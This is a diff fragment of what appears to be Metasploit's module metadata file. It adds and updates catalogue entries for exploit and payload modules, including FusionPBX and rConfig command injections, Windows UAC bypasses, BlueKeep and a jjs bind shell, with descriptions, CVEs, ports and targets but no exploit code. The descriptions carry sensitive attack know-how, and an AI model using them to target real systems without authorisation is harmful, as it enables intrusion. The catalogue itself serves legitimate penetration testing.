+    "ref_name": "solaris/local/xscreensaver_log_priv_esc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "AKA": [
+        "raptor_xscreensaver"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_solaris/lpd/sendmail_exec": {
     "name": "Solaris LPD Command Execution",
     "fullname": "exploit/solaris/lpd/sendmail_exec",
@@ -82345,7 +83836,7 @@
     ],
     "platform": "Unix",
     "arch": "cmd",
-    "rport": 80,
+    "rport": 22,
     "autofilter_ports": [
       80,
       8080,
@@ -82855,7 +84346,7 @@
       "Linux x86",
       "BSD x86"
     ],
-    "mod_time": "2018-01-23 10:12:15 +0000",
+    "mod_time": "2019-11-03 00:33:24 +0000",
     "path": "/modules/exploits/unix/local/setuid_nmap.rb",
     "is_install_path": true,
     "ref_name": "unix/local/setuid_nmap",
@@ -82863,6 +84354,12 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "Stability": [
+        "crash-safe"
+      ]
     },
     "needs_cleanup": null
   },
@@ -83502,6 +84999,55 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/webapp/ajenti_auth_username_cmd_injection": {
+    "name": "Ajenti auth username Command Injection",
+    "fullname": "exploit/unix/webapp/ajenti_auth_username_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-14",
+    "type": "exploit",
+    "author": [
+      "Jeremy Brown",
+      "Onur ER <onur@onurer.net>"
+    ],
+    "description": "This module exploits a command injection in Ajenti == 2.1.31.\n        By injecting a command into the username POST parameter to api/core/auth, a shell can be spawned.",
+    "references": [
+      "EDB-47497"
+    ],
+    "platform": "Python",
+    "arch": "python",
+    "rport": 8000,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Ajenti == 2.1.31"
+    ],
+    "mod_time": "2019-11-20 19:09:24 +0000",
+    "path": "/modules/exploits/unix/webapp/ajenti_auth_username_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/ajenti_auth_username_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/arkeia_upload_exec": {
     "name": "Western Digital Arkeia Remote Code Execution",
     "fullname": "exploit/unix/webapp/arkeia_upload_exec",
@@ -84767,6 +86313,109 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/webapp/fusionpbx_exec_cmd_exec": {
+    "name": "FusionPBX Command exec.php Command Execution",
+    "fullname": "exploit/unix/webapp/fusionpbx_exec_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-02",
+    "type": "exploit",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module uses administrative functionality available in FusionPBX\n        to gain a shell.\n\n        The Command section of the application permits users with `exec_view`\n        permissions, or superadmin permissions, to execute arbitrary system\n        commands, or arbitrary PHP code, as the web server user.\n\n        This module has been tested successfully on FusionPBX version\n        4.4.1 on Ubuntu 19.04 (x64).",
+    "references": [
+      "URL-https://docs.fusionpbx.com/en/latest/advanced/command.html"
+    ],
+    "platform": "Linux,PHP,Unix",
+    "arch": "php, cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (PHP In-Memory)",
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2019-11-01 23:38:51 +0000",
+    "path": "/modules/exploits/unix/webapp/fusionpbx_exec_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/fusionpbx_exec_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": true,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
+  "exploit_unix/webapp/fusionpbx_operator_panel_exec_cmd_exec": {
+    "name": "FusionPBX Operator Panel exec.php Command Execution",
+    "fullname": "exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-06-06",
+    "type": "exploit",
+    "author": [
+      "Dustin Cobb",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability\n        in FusionPBX versions 4.4.3 and prior.\n\n        The `exec.php` file within the Operator Panel permits users with\n        `operator_panel_view` permissions, or administrator permissions,\n        to execute arbitrary commands as the web server user by sending\n        a `system` command to the FreeSWITCH event socket interface.\n\n        This module has been tested successfully on FusionPBX version\n        4.4.1 on Ubuntu 19.04 (x64).",
+    "references": [
+      "CVE-2019-11409",
+      "EDB-46985",
+      "URL-https://blog.gdssecurity.com/labs/2019/6/7/rce-using-caller-id-multiple-vulnerabilities-in-fusionpbx.html",
+      "URL-https://github.com/fusionpbx/fusionpbx/commit/e43ca27ba2d9c0109a6bf198fe2f8d79f63e0611"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2019-11-01 22:17:26 +0000",
+    "path": "/modules/exploits/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/fusionpbx_operator_panel_exec_cmd_exec",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/generic_exec": {
     "name": "Generic Web Application Unix Command Execution",
     "fullname": "exploit/unix/webapp/generic_exec",
@@ -87344,6 +88993,59 @@
     },
     "needs_cleanup": null
   },
+  "exploit_unix/webapp/rconfig_install_cmd_exec": {
+    "name": "rConfig install Command Execution",
+    "fullname": "exploit/unix/webapp/rconfig_install_cmd_exec",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-28",
+    "type": "exploit",
+    "author": [
+      "mhaskar",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module exploits an unauthenticated command injection vulnerability\n        in rConfig versions 3.9.2 and prior. The `install` directory is not\n        automatically removed after installation, allowing unauthenticated users\n        to execute arbitrary commands via the `ajaxServerSettingsChk.php` file\n        as the web server user.\n\n        This module has been tested successfully on rConfig version 3.9.2 on\n        CentOS 7.7.1908 (x64).",
+    "references": [
+      "CVE-2019-16662",
+      "EDB-47555",
+      "URL-https://gist.github.com/mhaskar/ceb65fa4ca57c3cdccc1edfe2390902e",
+      "URL-https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2019-11-01 20:33:23 +0000",
+    "path": "/modules/exploits/unix/webapp/rconfig_install_cmd_exec.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/rconfig_install_cmd_exec",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/redmine_scm_exec": {
     "name": "Redmine SCM Repository Arbitrary Command Execution",
     "fullname": "exploit/unix/webapp/redmine_scm_exec",
@@ -89808,6 +91510,56 @@
     },
     "needs_cleanup": true
   },
+  "exploit_unix/webapp/wp_plainview_activity_monitor_rce": {
+    "name": "Wordpress Plainview Activity Monitor RCE",
+    "fullname": "exploit/unix/webapp/wp_plainview_activity_monitor_rce",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2018-08-26",
+    "type": "exploit",
+    "author": [
+      "LydA(c)ric LEFEBVRE",
+      "Leo LE BOUTER"
+    ],
+    "description": "Plainview Activity Monitor Wordpress plugin is vulnerable to OS\n          command injection which allows an attacker to remotely execute\n          commands on underlying system. Application passes unsafe user supplied\n          data to ip parameter into activities_overview.php.\n          Privileges are required in order to exploit this vulnerability.\n\n          Vulnerable plugin version: 20161228 and possibly prior\n          Fixed plugin version: 20180826",
+    "references": [
+      "CVE-2018-15877",
+      "EDB-45274"
+    ],
+    "platform": "PHP",
+    "arch": "php",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "WordPress"
+    ],
+    "mod_time": "2019-11-28 20:13:21 +0000",
+    "path": "/modules/exploits/unix/webapp/wp_plainview_activity_monitor_rce.rb",
+    "is_install_path": true,
+    "ref_name": "unix/webapp/wp_plainview_activity_monitor_rce",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_unix/webapp/wp_platform_exec": {
     "name": "WordPress Platform Theme File Upload Vulnerability",
     "fullname": "exploit/unix/webapp/wp_platform_exec",
@@ -108747,7 +110499,7 @@
     "targets": [
       "Windows 7 SP1 / Office 2010 SP2 / Office 2013"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-10 09:53:13 +0000",
     "path": "/modules/exploits/windows/fileformat/ms14_060_sandworm.rb",
     "is_install_path": true,
     "ref_name": "windows/fileformat/ms14_060_sandworm",
@@ -108755,6 +110507,9 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "sandworm"
+      ]
     },
     "needs_cleanup": null
   },
@@ -116833,6 +118588,56 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/http/file_sharing_wizard_seh": {
+    "name": "File Sharing Wizard - POST SEH Overflow",
+    "fullname": "exploit/windows/http/file_sharing_wizard_seh",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2019-09-24",
+    "type": "exploit",
+    "author": [
+      "x00pwn",
+      "Dean Welch <dean_welch@rapid7.com>"
+    ],
+    "description": "This module exploits an unauthenticated HTTP POST SEH-based buffer overflow in File Sharing Wizard 1.5.0.",
+    "references": [
+      "CVE-2019-16724",
+      "EDB-47412"
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows Vista / Windows 7 (x86)"
+    ],
+    "mod_time": "2019-10-08 11:44:41 +0000",
+    "path": "/modules/exploits/windows/http/file_sharing_wizard_seh.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/file_sharing_wizard_seh",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/http/generic_http_dll_injection": {
     "name": "Generic Web Application DLL Injection",
     "fullname": "exploit/windows/http/generic_http_dll_injection",
@@ -124986,6 +126791,51 @@
     },
     "needs_cleanup": true
   },
+  "exploit_windows/local/bypassuac_dotnet_profiler": {
+    "name": "Windows Escalate UAC Protection Bypass (Via dot net profiler)",
+    "fullname": "exploit/windows/local/bypassuac_dotnet_profiler",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "Casey Smith",
+      "\"Stefan Kanthak\" <stefan.kanthak () nexgo de>",
+      "bwatters-r7"
+    ],
+    "description": "Microsoft Windows allows for the automatic loading of a profiling COM object during\n      the launch of a CLR process based on certain environment variables ostensibly to\n      monitor execution.  In this case, we abuse the profiler by pointing to a payload DLL\n      that will be launched as the profiling thread.  This thread will run at the permission\n      level of the calling process, so an auto-elevating process will launch the DLL with\n      elevated permissions.  In this case, we use gpedit.msc as the auto-elevated CLR\n      process, but others would work, too.",
+    "references": [
+      "URL-https://seclists.org/fulldisclosure/2017/Jul/11",
+      "URL-https://offsec.provadys.com/UAC-bypass-dotnet.html"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 12:57:33 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_dotnet_profiler",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/bypassuac_eventvwr": {
     "name": "Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)",
     "fullname": "exploit/windows/local/bypassuac_eventvwr",
@@ -125158,6 +127008,52 @@
     },
     "needs_cleanup": true
   },
+  "exploit_windows/local/bypassuac_sdclt": {
+    "name": "Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)",
+    "fullname": "exploit/windows/local/bypassuac_sdclt",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2017-03-17",
+    "type": "exploit",
+    "author": [
+      "enigma0x3",
+      "bwatters-r7"
+    ],
+    "description": "This module will bypass Windows UAC by hijacking a special key in the Registry under\n        the current user hive, and inserting a custom command that will get invoked when\n        Window backup and restore is launched. It will spawn a second shell that has the UAC\n        flag turned off.\n\n        This module modifies a registry key, but cleans up the key once the payload has\n        been invoked.",
+    "references": [
+      "URL-https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/",
+      "URL-https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-SDCLTBypass.ps1",
+      "URL-https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-11-18 01:45:57 +0000",
+    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/bypassuac_sdclt",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "SideEffects": [
+        "artifacts-on-disk",
+        "screen-effects"
+      ]
+    },
+    "needs_cleanup": true
+  },
   "exploit_windows/local/bypassuac_silentcleanup": {
     "name": "Windows Escalate UAC Protection Bypass (Via SilentCleanup)",
     "fullname": "exploit/windows/local/bypassuac_silentcleanup",
@@ -125193,7 +127089,7 @@
     "targets": [
       "Microsoft Windows"
     ],
-    "mod_time": "2019-07-02 12:36:07 +0000",
+    "mod_time": "2019-12-05 15:08:50 +0000",
     "path": "/modules/exploits/windows/local/bypassuac_silentcleanup.rb",
     "is_install_path": true,
     "ref_name": "windows/local/bypassuac_silentcleanup",
@@ -125421,6 +127317,52 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/comahawk": {
+    "name": "Microsoft UPnP Local Privilege Elevation Vulnerability",
+    "fullname": "exploit/windows/local/comahawk",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-11-12",
+    "type": "exploit",
+    "author": [
+      "NCC Group",
+      "hoangprod",
+      "bwatters-r7"
+    ],
+    "description": "This exploit uses two vulnerabilities to execute a command as an elevated user.\n      The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to\n      NT AUTHORITY\\LOCAL SERVICE\n      The second (CVE-2019-1322) leverages the Update Orchestrator Service to\n      elevate from NT AUTHORITY\\LOCAL SERVICE to NT AUTHORITY\\SYSTEM.",
+    "references": [
+      "CVE-2019-1322",
+      "CVE-2019-1405",
+      "EDB-47684",
+      "URL-https://github.com/apt69/COMahawk",
+      "URL-https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/",
+      "URL-https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Windows x64"
+    ],
+    "mod_time": "2019-12-18 14:33:13 +0000",
+    "path": "/modules/exploits/windows/local/comahawk.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/comahawk",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/local/current_user_psexec": {
     "name": "PsExec via Current User Token",
     "fullname": "exploit/windows/local/current_user_psexec",
@@ -126384,7 +128326,7 @@
     "needs_cleanup": null
   },
   "exploit_windows/local/ms16_014_wmi_recv_notif": {
-    "name": "Windows WMI Recieve Notification Exploit",
+    "name": "Windows WMI Receive Notification Exploit",
     "fullname": "exploit/windows/local/ms16_014_wmi_recv_notif",
     "aliases": [
 
@@ -126417,7 +128359,7 @@
     "targets": [
       "Windows 7 SP0/SP1"
     ],
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/exploits/windows/local/ms16_014_wmi_recv_notif.rb",
     "is_install_path": true,
     "ref_name": "windows/local/ms16_014_wmi_recv_notif",
@@ -126931,7 +128873,7 @@
     "name": "Windows Manage Memory Payload Injection",
     "fullname": "exploit/windows/local/payload_inject",
     "aliases": [
-
+      "post/windows/manage/payload_inject"
     ],
     "rank": 600,
     "disclosure_date": "2011-10-12",
@@ -126956,7 +128898,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2018-11-02 14:57:41 +0000",
+    "mod_time": "2019-12-12 15:20:51 +0000",
     "path": "/modules/exploits/windows/local/payload_inject.rb",
     "is_install_path": true,
     "ref_name": "windows/local/payload_inject",
@@ -127007,6 +128949,47 @@
     },
     "needs_cleanup": null
   },
+  "exploit_windows/local/persistence_image_exec_options": {
+    "name": "Windows Silent Process Exit Persistence",
+    "fullname": "exploit/windows/local/persistence_image_exec_options",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2008-06-28",
+    "type": "exploit",
+    "author": [
+      "Mithun Shanbhag",
+      "bwatters-r7"
+    ],
+    "description": "Windows allows you to set up a debug process when a process exits.\n      This module uploads a payload and declares that it is the debug\n      process to launch when a specified process exits.",
+    "references": [
+      "URL-https://attack.mitre.org/techniques/T1183/",
+      "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2019-11-16 04:58:02 +0000",
+    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
+    "is_install_path": true,
+    "ref_name": "windows/local/persistence_image_exec_options",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": null
+  },
   "exploit_windows/local/persistence_service": {
     "name": "Windows Persistent Service Installer",
     "fullname": "exploit/windows/local/persistence_service",
@@ -127035,7 +129018,7 @@
     "targets": [
       "Windows"
     ],
-    "mod_time": "2019-05-31 17:44:35 +0000",
+    "mod_time": "2019-11-16 04:57:18 +0000",
     "path": "/modules/exploits/windows/local/persistence_service.rb",
     "is_install_path": true,
     "ref_name": "windows/local/persistence_service",
@@ -129901,7 +131884,7 @@
     "targets": [
       "Gh0st Beta 3.6"
     ],
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/exploits/windows/misc/gh0st.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/gh0st",
@@ -131876,7 +133859,7 @@
       "PlugX Type I",
       "PlugX Type II"
     ],
-    "mod_time": "2019-08-15 18:10:44 +0000",
+    "mod_time": "2019-10-05 14:40:27 +0000",
     "path": "/modules/exploits/windows/misc/plugx.rb",
     "is_install_path": true,
     "ref_name": "windows/misc/plugx",
@@ -133175,7 +135158,7 @@
     "targets": [
       "Automatic"
     ],
-    "mod_time": "2017-09-13 22:03:34 +0000",
+    "mod_time": "2019-10-05 14:13:38 +0000",
     "path": "/modules/exploits/windows/mssql/mssql_linkcrawler.rb",
     "is_install_path": true,
     "ref_name": "windows/mssql/mssql_linkcrawler",
@@ -134587,10 +136570,11 @@
       "OJ Reeves <oj@beyondbinary.io>",
       "Brent Cook <bcook@rapid7.com>"
     ],
-    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.",
+    "description": "The RDP termdd.sys driver improperly handles binds to internal-only channel MS_T120,\n        allowing a malformed Disconnect Provider Indication message to cause use-after-free.\n        With a controllable data/size remote nonpaged pool spray, an indirect call gadget of\n        the freed channel is used to achieve arbitrary code execution.\n\n        Windows 7 SP1 and Windows Server 2008 R2 are the only currently supported targets.\n\n        Windows 7 SP1 should be exploitable in its default configuration, assuming your target\n        selection is correctly matched to the system's memory layout.\n\n        HKLM\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Winstations\\RDP-Tcp\\fDisableCam\n        *needs* to be set to 0 for exploitation to succeed against Windows Server 2008 R2.\n        This is a non-standard configuration for normal servers, and the target will crash if\n        the aforementioned Registry key is not set!\n\n        If the target is crashing regardless, you will likely need to determine the non-paged\n        pool base in kernel memory and set it as the GROOMBASE option.",
     "references": [
       "CVE-2019-0708",
-      "URL-https://github.com/zerosum0x0/CVE-2019-0708"
+      "URL-https://github.com/zerosum0x0/CVE-2019-0708",
+      "URL-https://zerosum0x0.blogspot.com/2019/11/fixing-remote-windows-kernel-payloads-meltdown.html"
     ],
     "platform": "Windows",
     "arch": "",
@@ -134611,7 +136595,7 @@
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)",
       "Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)"
     ],
-    "mod_time": "2019-09-23 11:01:04 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
     "path": "/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/rdp/cve_2019_0708_bluekeep_rce",
@@ -136314,7 +138298,7 @@
       "Execute payload",
       "Neutralize implant"
     ],
-    "mod_time": "2019-09-30 14:28:53 +0000",
+    "mod_time": "2019-11-25 18:26:37 +0000",
     "path": "/modules/exploits/windows/smb/doublepulsar_rce.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/doublepulsar_rce",
@@ -136330,7 +138314,7 @@
         "exploit/windows/smb/ms17_010_eternalblue"
       ],
       "Stability": [
-        "crash-safe"
+        "crash-os-down"
       ],
       "Reliability": [
         "repeatable-session"
@@ -136409,7 +138393,7 @@
       "Windows x86",
       "Windows x64"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-11 09:41:08 +0000",
     "path": "/modules/exploits/windows/smb/group_policy_startup.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/group_policy_startup",
@@ -136417,6 +138401,9 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "badsamba"
+      ]
     },
     "needs_cleanup": null
   },
@@ -136522,7 +138509,7 @@
     "author": [
       "Solar Eclipse <solareclipse@phreedom.org>"
     ],
-    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
+    "description": "This is an exploit for a previously undisclosed\n        vulnerability in the bit string decoding code in the\n        Microsoft ASN.1 library. This vulnerability is not related\n        to the bit string vulnerability described in eEye advisory\n        AD20040210-2. Both vulnerabilities were fixed in the\n        MS04-007 patch.  Windows 2000 SP4 Rollup 1 also patches this\n        vulnerability.\n\n        You are only allowed one attempt with this vulnerability. If\n        the payload fails to execute, the LSASS system service will\n        crash and the target system will automatically reboot itself\n        in 60 seconds. If the payload succeeds, the system will no\n        longer be able to process authentication requests, denying\n        all attempts to login through SMB or at the console. A\n        reboot is required to restore proper functioning of an\n        exploited system.\n\n        This exploit has been successfully tested with the win32/*/reverse_tcp\n        payloads, however a few problems were encountered when using the\n        equivalent bind payloads. Your mileage may vary.",
     "references": [
       "CVE-2003-0818",
       "OSVDB-3902",
@@ -136543,7 +138530,7 @@
     "targets": [
       "Windows 2000 SP2-SP4 + Windows XP SP0-SP1"
     ],
-    "mod_time": "2017-09-17 16:00:04 +0000",
+    "mod_time": "2019-12-03 20:22:05 +0000",
     "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms04_007_killbill",
@@ -136551,6 +138538,16 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "AKA": [
+        "kill-bill"
+      ],
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
     },
     "needs_cleanup": null
   },
@@ -136828,7 +138825,7 @@
       "(stack)  Windows XP SP1 Italian",
       "(wcscpy) Windows 2003 SP0"
     ],
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-12-03 06:32:02 +0000",
     "path": "/modules/exploits/windows/smb/ms06_040_netapi.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms06_040_netapi",
@@ -136836,6 +138833,13 @@
     "post_auth": false,
     "default_credential": false,
     "notes": {
+      "Reliability": [
+        "unreliable-session"
+      ],
+      "Stability": [
+        "crash-os-restarts",
+        "crash-service-down"
+      ]
     },
     "needs_cleanup": null
   },
@@ -137182,7 +139186,7 @@
     "targets": [
       "Windows Vista SP1/SP2 and Server 2008 (x86)"
     ],
-    "mod_time": "2019-05-23 07:01:21 +0000",
+    "mod_time": "2019-10-05 14:26:34 +0000",
     "path": "/modules/exploits/windows/smb/ms09_050_smb2_negotiate_func_index.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms09_050_smb2_negotiate_func_index",
@@ -137363,7 +139367,7 @@
     "targets": [
       "Windows 7 and Server 2008 R2 (x64) All Service Packs"
     ],
-    "mod_time": "2019-05-22 17:16:06 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
     "path": "/modules/exploits/windows/smb/ms17_010_eternalblue.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms17_010_eternalblue",
@@ -137472,7 +139476,7 @@
       "Native upload",
       "MOF upload"
     ],
-    "mod_time": "2019-05-22 20:05:44 +0000",
+    "mod_time": "2019-10-30 22:20:36 +0000",
     "path": "/modules/exploits/windows/smb/ms17_010_psexec.rb",
     "is_install_path": true,
     "ref_name": "windows/smb/ms17_010_psexec",
@@ -140471,7 +142475,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2018-12-17 19:28:07 +0000",
+    "mod_time": "2019-12-18 12:11:56 +0000",
     "path": "/modules/payloads/singles/bsd/vax/shell_reverse_tcp.rb",
     "is_install_path": true,
     "ref_name": "bsd/vax/shell_reverse_tcp",
@@ -141588,6 +143592,42 @@
     },
     "needs_cleanup": false
   },
+  "payload_cmd/unix/bind_jjs": {
+    "name": "Unix Command Shell, Bind TCP (via jjs)",
+    "fullname": "payload/cmd/unix/bind_jjs",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "conerpirate",
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "Listen for a connection and spawn a command shell via jjs",
+    "references": [
+      "URL-https://gtfobins.github.io/gtfobins/jjs/",
+      "URL-https://cornerpirate.com/2018/08/17/java-gives-a-shell-for-everything/",
+      "URL-https://h4wkst3r.blogspot.com/2018/05/code-execution-with-jdk-scripting-tools.html"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2019-11-21 16:38:18 +0000",
+    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/unix/bind_jjs",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "needs_cleanup": false
+  },
